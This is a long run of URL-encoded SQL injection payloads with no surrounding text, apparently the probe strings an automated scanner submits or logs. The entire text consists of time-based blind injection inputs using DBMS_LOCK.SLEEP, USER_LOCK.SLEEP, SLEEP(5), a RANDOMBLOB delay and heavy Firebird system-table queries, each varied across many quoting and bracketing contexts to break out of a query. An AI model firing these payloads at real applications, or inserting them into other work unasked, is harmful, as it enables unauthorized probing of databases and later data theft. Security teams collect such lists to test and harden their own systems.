1%22%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%22doGC%22%3D%22doGC 1%22%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%22jVJj%22%3D%22jVJj 1%22%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%22UVfb%22%3D%22UVfb 1%22%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%22rAWH%22%20LIKE%20%22rAWH 1%22%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%22ddbd%22%20LIKE%20%22ddbd 1%22%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%22iQXi%22%20LIKE%20%22iQXi 1%22%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%22SxjY%22%20LIKE%20%22SxjY 1%29%20WHERE%206827%3D6827%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- 1%27%29%20WHERE%206261%3D6261%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- 1%27%20WHERE%209935%3D9935%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- 1%22%20WHERE%204894%3D4894%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- 1%27%20%7C%7C%20%28SELECT%204046%20FROM%20DUAL%20WHERE%208397%3D8397%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204563%20WHERE%208945%3D8945%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%205505%20FROM%20DUAL%20WHERE%204470%3D4470%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20%29 1%20%2B%20%28SELECT%207108%20WHERE%201502%3D1502%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20%29 1%27%20%2B%20%28SELECT%20%27ojbV%27%20FROM%20DUAL%20WHERE%207771%3D7771%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27GaHf%27%20WHERE%206336%3D6336%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20%23 1%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- 1%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- 1%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- 1%22%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- 1%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%284066%3D4066 1%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%286431%3D6431 1%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%281656%3D1656 1%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- 1%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%27Xnwo%27%3D%27Xnwo 1%27%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%27EpBj%27%3D%27EpBj 1%27%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%27FDYH%27%3D%27FDYH 1%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%27QWQR%27%3D%27QWQR 1%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%27QHrC%27%20LIKE%20%27QHrC 1%27%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%27vKEH%27%20LIKE%20%27vKEH 1%27%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%27hrIw%27%20LIKE%20%27hrIw 1%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%27Dsex%27%20LIKE%20%27Dsex 1%22%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%22gWYP%22%3D%22gWYP 1%22%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%22DKmY%22%3D%22DKmY 1%22%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%22xZbG%22%3D%22xZbG 1%22%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%22LvkY%22%3D%22LvkY 1%22%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%22vBeh%22%20LIKE%20%22vBeh 1%22%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%22yczA%22%20LIKE%20%22yczA 1%22%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%22uhRn%22%20LIKE%20%22uhRn 1%22%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%22tFev%22%20LIKE%20%22tFev 1%29%20WHERE%205481%3D5481%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- 1%27%29%20WHERE%201226%3D1226%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- 1%27%20WHERE%206366%3D6366%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- 1%22%20WHERE%206831%3D6831%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- 1%27%20%7C%7C%20%28SELECT%208568%20FROM%20DUAL%20WHERE%202484%3D2484%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203683%20WHERE%209614%3D9614%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%209324%20FROM%20DUAL%20WHERE%207623%3D7623%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20%29 1%20%2B%20%28SELECT%206128%20WHERE%201074%3D1074%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20%29 1%27%20%2B%20%28SELECT%20%27gTeJ%27%20FROM%20DUAL%20WHERE%208082%3D8082%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27pIoS%27%20WHERE%204514%3D4514%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20%23 1%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- 1%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- 1%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- 1%22%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- 1%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%289716%3D9716 1%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%289288%3D9288 1%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%283905%3D3905 1%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- 1%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%27fIMe%27%3D%27fIMe 1%27%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%27FhrV%27%3D%27FhrV 1%27%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%28%27ITgm%27%3D%27ITgm 1%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%27heKp%27%3D%27heKp 1%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%27mPQB%27%20LIKE%20%27mPQB 1%27%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%27MWwY%27%20LIKE%20%27MWwY 1%27%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%28%27UhTm%27%20LIKE%20%27UhTm 1%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%27Rrjs%27%20LIKE%20%27Rrjs 1%22%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%22PCIV%22%3D%22PCIV 1%22%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%22rPzN%22%3D%22rPzN 1%22%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%28%22WsfR%22%3D%22WsfR 1%22%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%22ZPMi%22%3D%22ZPMi 1%22%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%22wChu%22%20LIKE%20%22wChu 1%22%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%22KqQt%22%20LIKE%20%22KqQt 1%22%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%28%22pFKR%22%20LIKE%20%22pFKR 1%22%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%22yAEl%22%20LIKE%20%22yAEl 1%29%20WHERE%209148%3D9148%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- 1%27%29%20WHERE%205309%3D5309%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- 1%27%20WHERE%203977%3D3977%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- 1%22%20WHERE%202946%3D2946%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- 1%27%20%7C%7C%20%28SELECT%208471%20FROM%20DUAL%20WHERE%209978%3D9978%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203825%20WHERE%202324%3D2324%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%202435%20FROM%20DUAL%20WHERE%206892%3D6892%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20%29 1%20%2B%20%28SELECT%202728%20WHERE%203105%3D3105%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20%29 1%27%20%2B%20%28SELECT%20%27qqgC%27%20FROM%20DUAL%20WHERE%203394%3D3394%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27dQqO%27%20WHERE%207955%3D7955%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20%23 1%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- 1%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- 1%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- 1%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- 1%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%283371%3D3371 1%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%286007%3D6007 1%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%281581%3D1581 1%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- 1%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%27UehT%27%3D%27UehT 1%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%27CKDf%27%3D%27CKDf 1%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%28%27aghd%27%3D%27aghd 1%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%27uRVf%27%3D%27uRVf 1%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%27DkbK%27%20LIKE%20%27DkbK 1%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%27LyXQ%27%20LIKE%20%27LyXQ 1%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%28%27Seud%27%20LIKE%20%27Seud 1%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%27RJnM%27%20LIKE%20%27RJnM 1%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%22gbUl%22%3D%22gbUl 1%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%22QRLK%22%3D%22QRLK 1%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%28%22ueIv%22%3D%22ueIv 1%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%22RBHs%22%3D%22RBHs 1%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%22JWwN%22%20LIKE%20%22JWwN 1%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%22RHAm%22%20LIKE%20%22RHAm 1%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%28%22Awzv%22%20LIKE%20%22Awzv 1%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%22JhKt%22%20LIKE%20%22JhKt 1%29%20WHERE%203845%3D3845%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- 1%27%29%20WHERE%202205%3D2205%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- 1%27%20WHERE%204802%3D4802%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- 1%22%20WHERE%207489%3D7489%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- 1%27%20%7C%7C%20%28SELECT%207071%20FROM%20DUAL%20WHERE%203919%3D3919%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208234%20WHERE%207939%3D7939%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%208199%20FROM%20DUAL%20WHERE%205963%3D5963%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20%29 1%20%2B%20%28SELECT%201933%20WHERE%208203%3D8203%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20%29 1%27%20%2B%20%28SELECT%20%27peau%27%20FROM%20DUAL%20WHERE%201475%3D1475%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Dxvp%27%20WHERE%201280%3D1280%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20%23 1%29%20AND%20SLEEP%285%29 1%27%29%20AND%20SLEEP%285%29 1%27%20AND%20SLEEP%285%29 1%22%20AND%20SLEEP%285%29 1%29%20AND%20SLEEP%285%29%20AND%20%289347%3D9347 1%29%29%20AND%20SLEEP%285%29%20AND%20%28%289131%3D9131 1%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%282293%3D2293 1%20AND%20SLEEP%285%29 1%27%29%20AND%20SLEEP%285%29%20AND%20%28%27jFxh%27%3D%27jFxh 1%27%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%27Hkor%27%3D%27Hkor 1%27%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%27lxKl%27%3D%27lxKl 1%27%20AND%20SLEEP%285%29%20AND%20%27hqgS%27%3D%27hqgS 1%27%29%20AND%20SLEEP%285%29%20AND%20%28%27Ntgp%27%20LIKE%20%27Ntgp 1%27%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%27Qqff%27%20LIKE%20%27Qqff 1%27%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%27TtTM%27%20LIKE%20%27TtTM 1%27%20AND%20SLEEP%285%29%20AND%20%27mKbw%27%20LIKE%20%27mKbw 1%22%29%20AND%20SLEEP%285%29%20AND%20%28%22NFnD%22%3D%22NFnD 1%22%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%22MClp%22%3D%22MClp 1%22%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%22wMFR%22%3D%22wMFR 1%22%20AND%20SLEEP%285%29%20AND%20%22qwWF%22%3D%22qwWF 1%22%29%20AND%20SLEEP%285%29%20AND%20%28%22lEOC%22%20LIKE%20%22lEOC 1%22%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%22FKJv%22%20LIKE%20%22FKJv 1%22%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%22TXfn%22%20LIKE%20%22TXfn 1%22%20AND%20SLEEP%285%29%20AND%20%22MzIN%22%20LIKE%20%22MzIN 1%29%20WHERE%202119%3D2119%20AND%20SLEEP%285%29 1%27%29%20WHERE%209509%3D9509%20AND%20SLEEP%285%29 1%27%20WHERE%202282%3D2282%20AND%20SLEEP%285%29 1%22%20WHERE%205566%3D5566%20AND%20SLEEP%285%29 1%27%20%7C%7C%20%28SELECT%209228%20FROM%20DUAL%20WHERE%205157%3D5157%20AND%20SLEEP%285%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204214%20WHERE%202005%3D2005%20AND%20SLEEP%285%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%208578%20FROM%20DUAL%20WHERE%205560%3D5560%20AND%20SLEEP%285%29%20%29 1%20%2B%20%28SELECT%204199%20WHERE%207823%3D7823%20AND%20SLEEP%285%29%20%29 1%27%20%2B%20%28SELECT%20%27kprn%27%20FROM%20DUAL%20WHERE%209877%3D9877%20AND%20SLEEP%285%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27IYNb%27%20WHERE%204205%3D4205%20AND%20SLEEP%285%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%20SLEEP%285%29%20%23 1%29%20AND%20SLEEP%285%29%23 1%27%29%20AND%20SLEEP%285%29%23 1%27%20AND%20SLEEP%285%29%23 1%22%20AND%20SLEEP%285%29%23 1%29%20AND%20SLEEP%285%29%23%20AND%20%281347%3D1347 1%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%282758%3D2758 1%29%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%287766%3D7766 1%20AND%20SLEEP%285%29%23 1%27%29%20AND%20SLEEP%285%29%23%20AND%20%28%27weAP%27%3D%27weAP 1%27%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%27JlVp%27%3D%27JlVp 1%27%29%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%28%27zXKC%27%3D%27zXKC 1%27%20AND%20SLEEP%285%29%23%20AND%20%27oUip%27%3D%27oUip 1%27%29%20AND%20SLEEP%285%29%23%20AND%20%28%27FBGJ%27%20LIKE%20%27FBGJ 1%27%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%27FryT%27%20LIKE%20%27FryT 1%27%29%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%28%27Qwnh%27%20LIKE%20%27Qwnh 1%27%20AND%20SLEEP%285%29%23%20AND%20%27yoPT%27%20LIKE%20%27yoPT 1%22%29%20AND%20SLEEP%285%29%23%20AND%20%28%22iiYk%22%3D%22iiYk 1%22%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%22sGQV%22%3D%22sGQV 1%22%29%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%28%22mhSG%22%3D%22mhSG 1%22%20AND%20SLEEP%285%29%23%20AND%20%22qKoa%22%3D%22qKoa 1%22%29%20AND%20SLEEP%285%29%23%20AND%20%28%22dbqU%22%20LIKE%20%22dbqU 1%22%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%22UZCp%22%20LIKE%20%22UZCp 1%22%29%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%28%22Sran%22%20LIKE%20%22Sran 1%22%20AND%20SLEEP%285%29%23%20AND%20%22YVHj%22%20LIKE%20%22YVHj 1%29%20WHERE%206966%3D6966%20AND%20SLEEP%285%29%23 1%27%29%20WHERE%206661%3D6661%20AND%20SLEEP%285%29%23 1%27%20WHERE%208507%3D8507%20AND%20SLEEP%285%29%23 1%22%20WHERE%202623%3D2623%20AND%20SLEEP%285%29%23 1%27%20%7C%7C%20%28SELECT%205087%20FROM%20DUAL%20WHERE%206838%3D6838%20AND%20SLEEP%285%29%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208512%20WHERE%201002%3D1002%20AND%20SLEEP%285%29%23%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%203139%20FROM%20DUAL%20WHERE%207820%3D7820%20AND%20SLEEP%285%29%23%20%29 1%20%2B%20%28SELECT%201786%20WHERE%208420%3D8420%20AND%20SLEEP%285%29%23%20%29 1%27%20%2B%20%28SELECT%20%27Xgou%27%20FROM%20DUAL%20WHERE%205014%3D5014%20AND%20SLEEP%285%29%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Pwme%27%20WHERE%203772%3D3772%20AND%20SLEEP%285%29%23%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%20SLEEP%285%29%23%20%23 